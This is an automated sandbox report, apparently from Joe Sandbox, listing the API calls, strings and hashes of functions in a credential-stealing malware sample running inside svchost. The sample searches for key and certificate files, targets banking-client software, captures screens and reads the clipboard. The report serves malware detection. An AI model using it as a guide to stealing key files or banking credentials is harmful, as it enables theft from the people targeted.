                                                                                                                                                                                                                      • Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Iconic$AncestorClassInfoNamememset
                                                                                                                                                                                                                    • String ID: <$<
                                                                                                                                                                                                                    • API String ID: 3351429209-213342407
                                                                                                                                                                                                                    • Opcode ID: 282933c1f680c8cb9f3700dd2a73de88c1a8472c9d72b5b6ea3dba8f9ddf64ca
                                                                                                                                                                                                                    • Instruction ID: c43446ad1351886e48742841b18c3635539a3145da3112e01542b0426cebb2c5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 282933c1f680c8cb9f3700dd2a73de88c1a8472c9d72b5b6ea3dba8f9ddf64ca
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18D1D470D00219AFDB26CFA5DC84BAEBBB9EF84708F14465AE505A7280DB709F41CF91
                                                                                                                                                                                                                    Function 02C8BBE9 Relevance: 49.3, APIs: 20, Strings: 8, Instructions: 294fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 02C8BBF5
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8BC04
                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02C8BC51
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8BC6A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,found.), ref: 02C8BC81
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,asus), ref: 02C8BC98
                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 02C8BCAF
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8BCE4
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8BD1E
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8BD28
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8BD30
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8BD3F
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8BD46
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 02C8BF52
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFile$DirectoryFindLastPath$AdminAttributesBackslashCreateCurrentDriveFirstFolderMakeModeNextSystemTypeUser
                                                                                                                                                                                                                    • String ID: *.00*$.txt$.zip$7F1BFC0D$asus$found.$keys$path
                                                                                                                                                                                                                    • API String ID: 3516781098-2328322984
                                                                                                                                                                                                                    • Opcode ID: 9cace01d941638685325a88dd9c4c28d1aafd3d4e47a1f99c7e9ef2678f40126
                                                                                                                                                                                                                    • Instruction ID: 663f24dd68829ed58e38b891f7cb07a8d44e847048a019257ef6a73785fdd551
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cace01d941638685325a88dd9c4c28d1aafd3d4e47a1f99c7e9ef2678f40126
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0A1E4315087868FC716DB3494687ABBBE5EFC934DF188A59E8C9C7210EB31DA09C791
                                                                                                                                                                                                                    Function 02C8D189 Relevance: 49.3, APIs: 20, Strings: 8, Instructions: 294fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 02C8D195
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8D1A4
                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02C8D1F1
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8D20A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,found.), ref: 02C8D221
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,asus), ref: 02C8D238
                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 02C8D24F
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFCBF), ref: 02C8D284
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8D2C8
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8D2D0
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8D2E6
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 02C8D4F2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFile$DirectoryFindLastPath$AdminAttributesBackslashCreateCurrentDriveFirstFolderMakeModeNextSystemTypeUser
                                                                                                                                                                                                                    • String ID: *.00*$.txt$.zip$7F1BFCBF$asus$found.$keys$path
                                                                                                                                                                                                                    • API String ID: 3516781098-420153276
                                                                                                                                                                                                                    • Opcode ID: afc795ec085fddd7f3161c5f44be8212ee21ec8fc8a623a1a52825a712e90da7
                                                                                                                                                                                                                    • Instruction ID: ab943dccc9a927d00b5d65f13d034dea180e4f10a05dfd6fd7655d91402de88a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afc795ec085fddd7f3161c5f44be8212ee21ec8fc8a623a1a52825a712e90da7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30A1F8315087858FC716DB349468BABBBE5AFC5349F18CA58E8CAC7240EB31D509C791
                                                                                                                                                                                                                    Function 02C71180 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 203memorythreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7119E
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7622F570), ref: 02C711BD
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,java), ref: 02C711D5
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,.exe), ref: 02C711EB
                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(?,.p12,00000000), ref: 02C7120F
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71231
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7124E
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C71255
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C71265
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71281
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C89ED0,00000000,00000000,00000000), ref: 02C71295
                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 02C712B4
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C712E5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C71302
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C71309
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C71319
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71335
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8D540,00000000,00000000,00000000), ref: 02C71349
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8EB60,00000000,00000000,00000000), ref: 02C71386
                                                                                                                                                                                                                      • Part of subcall function 02C89E20: PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C89E47
                                                                                                                                                                                                                      • Part of subcall function 02C89E20: PathFileExistsA.SHLWAPI(?), ref: 02C89EB0
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7139E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C713AF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
                                                                                                                                                                                                                    • String ID: .exe$.p12$java$serverkey.dat
                                                                                                                                                                                                                    • API String ID: 183229269-3502489836
                                                                                                                                                                                                                    • Opcode ID: f680c842c16c72ab64df9a65bb09bd1b379547037e350193ea1be9a47f736af0
                                                                                                                                                                                                                    • Instruction ID: 11bba8a6c2a8effb5c3e6ee5715992e5dc9e33b41e28deec2c99e8fae3ac34ab
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f680c842c16c72ab64df9a65bb09bd1b379547037e350193ea1be9a47f736af0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9151E671E8522576EB319A618C49FEB7E6CDF81B55F184354BD0DAA1C0EBB0DA00CAF4
                                                                                                                                                                                                                    Function 02C8B810 Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 248COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C93170: memset.MSVCRT ref: 02C93194
                                                                                                                                                                                                                      • Part of subcall function 02C93170: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,ctunnel.exe,?,75AF7390,?), ref: 02C8B83C
                                                                                                                                                                                                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C8B85B
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8B86D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8B87E
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B8A7
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B8E1
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8B8EB
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8B8F3
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B904
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8B90B
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8B941
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8B980
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D,?,?), ref: 02C8B9C7
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D,ctunnel.exe,?,75AF7390,?), ref: 02C8BAA7
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 02C8BB09
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashFile$CreateDirectoryErrorHandleLast$AdminAttributesCloseCurrentExistsFolderInformationMakeModuleNameOpenProcessSnapshotSystemToolhelp32Usermemset
                                                                                                                                                                                                                    • String ID: 7F1BFC0D$\$ctunnel.exe$ctunnel.zip$pass.log$path_ctunnel.txt
                                                                                                                                                                                                                    • API String ID: 3886636124-1565033849
                                                                                                                                                                                                                    • Opcode ID: 5632cfc693b9e8f48569ad7b779458145c89946c573e244bd4fa9270bb4473db
                                                                                                                                                                                                                    • Instruction ID: 9745a22860d5e6ba97636dfaab07f19f23a1992d8541023edbfad4e199ed9e66
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5632cfc693b9e8f48569ad7b779458145c89946c573e244bd4fa9270bb4473db
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB9139309446598FDB16DB24A858BE6BBF8EF86308F14C7D4E889D7241DB30DE49CB90
                                                                                                                                                                                                                    Function 02C90BE0 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 165stringsynchronizationsleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C90C10
                                                                                                                                                                                                                    • PathFindFileNameA.SHLWAPI(?), ref: 02C90C1D
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(ISClient.cfg), ref: 02C90C32
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                                      • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                                      • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,GKUZ=,?,00000000,00000001), ref: 02C90C7D
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C90C9D
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C90CAF
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90CDE
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C90CEF
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C90CF6
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90D08
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90D19
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02C90D67
                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 02C90D7E
                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 02C90D87
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileHeap$Handle$Process$CharCloseCreateInformationMutexNamePathUpperstrstr$AllocateExistsFindFreeModulePrivateProfileReadReleaseSizeSleepStringValidateWritememset
                                                                                                                                                                                                                    • String ID: DefaultPrivateDir$GKUZ=$General$ISClient.cfg$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0#v$interpro.ini
                                                                                                                                                                                                                    • API String ID: 1392943061-2569638643
                                                                                                                                                                                                                    • Opcode ID: 9fd8be4243b616d36701170732b719105e80b8738c4a2baab95a9a0f829c0218
                                                                                                                                                                                                                    • Instruction ID: 36bb3138c4b6ac632d28e0c971c62c05d9625a71fc495c53c9344cf45005f770
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fd8be4243b616d36701170732b719105e80b8738c4a2baab95a9a0f829c0218
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F515C72D443955BEB228F28CC88BAA7BADEF84704F144698E58593241DB71F648CF51
                                                                                                                                                                                                                    Function 02C7C069 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 171windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 02C7C078
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7C0BB
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 02C7C0CB
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C0E5
                                                                                                                                                                                                                    • GetScrollBarInfo.USER32(00000000,000000FA,?,?,?,762330D0), ref: 02C7C100
                                                                                                                                                                                                                    • GetScrollBarInfo.USER32(00000000,000000FB,0000003C,?,?,762330D0), ref: 02C7C12D
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000005), ref: 02C7C165
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7C168
                                                                                                                                                                                                                    • IsIconic.USER32(00000000), ref: 02C7C087
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: IsWindow.USER32(00000000), ref: 02C7B9ED
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: IsWindowVisible.USER32(00000000), ref: 02C7B9FC
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: GetWindowRect.USER32(00000000,?), ref: 02C7BA39
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: GetClassLongA.USER32(00000000,000000E6), ref: 02C7BA42
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: PrintWindow.USER32(00000000,?,00000000,?,762330D0,?,?,?,02C7843E), ref: 02C7BA55
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,762330D0,?,?,?,02C7843E), ref: 02C7BA7B
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: CreateRectRgn.GDI32(?,?,02C7843E,?), ref: 02C7BA91
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: GetWindowRgn.USER32(00000000,00000000), ref: 02C7BA9B
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: OffsetRgn.GDI32(00000000,?,?), ref: 02C7BAB5
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: SelectClipRgn.GDI32(?,00000000), ref: 02C7BAC0
                                                                                                                                                                                                                      • Part of subcall function 02C7B9D0: BitBlt.GDI32(?,?,?,02C7843E,?,?,00000000,00000000,00CC0020), ref: 02C7BAE9
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7C18E
                                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 02C7C19D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7C1CE
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 02C7C1DB
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 02C7C1F2
                                                                                                                                                                                                                    • GetScrollBarInfo.USER32(?,000000FA,0000003C,?,?,762330D0), ref: 02C7C21D
                                                                                                                                                                                                                    • GetScrollBarInfo.USER32(?,000000FB,0000003C,?,?,762330D0), ref: 02C7C255
                                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 02C7C292
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7C295
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$InfoRectScroll$Long$Iconicmemset$ClassClipCreateOffsetPrintRedrawSelectVisible
                                                                                                                                                                                                                    • String ID: <$<
                                                                                                                                                                                                                    • API String ID: 3463799249-213342407
                                                                                                                                                                                                                    • Opcode ID: 177739d8dc674bb14e83d376c842133f055ce4819bffd8eeb7c026f821d27920
                                                                                                                                                                                                                    • Instruction ID: b1d32d639a922d41fb39542d9b211e93deef972600654bc564f20758c79fc4a9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 177739d8dc674bb14e83d376c842133f055ce4819bffd8eeb7c026f821d27920
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7613871D042299FDF15CFA8DC84BDEBBB9BF48714F14429AE419A7280DB706A41CF91
                                                                                                                                                                                                                    Function 02C81E60 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 173memorythreadclipboardCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C81E7D
                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 02C81E9E
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C81EBF
                                                                                                                                                                                                                    • GetGUIThreadInfo.USER32(00000000), ref: 02C81EC6
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32 ref: 02C81EDC
                                                                                                                                                                                                                    • GetActiveWindow.USER32 ref: 02C81EEA
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02C81F18
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000013), ref: 02C81F3A
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C81F41
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C81F51
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02C81F6E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81FBB
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C81FBE
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81FCB
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C81FCE
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 02C81FD9
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 02C8201F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                    • API String ID: 3472172748-4108050209
                                                                                                                                                                                                                    • Opcode ID: 1e0353c49d7618f6200cc3e14a074c9fbf4fca6a3c78bbe3ceba75e97713b0cf
                                                                                                                                                                                                                    • Instruction ID: a156dc5ad741d207e8c9c0acbf238cef9a9bcdd26c7da09ebea0147bb90b3550
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e0353c49d7618f6200cc3e14a074c9fbf4fca6a3c78bbe3ceba75e97713b0cf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83515C71A443416BD721AF349C4CF6BBBD8EFC570DF084758F94997280DBA2DA0687A1
                                                                                                                                                                                                                    Function 02C81B80 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 169memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C81BB2
                                                                                                                                                                                                                      • Part of subcall function 02C81AC0: GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02C81ACE
                                                                                                                                                                                                                      • Part of subcall function 02C81AC0: GetWindowTextA.USER32(00000000,?,00000104), ref: 02C81AE9
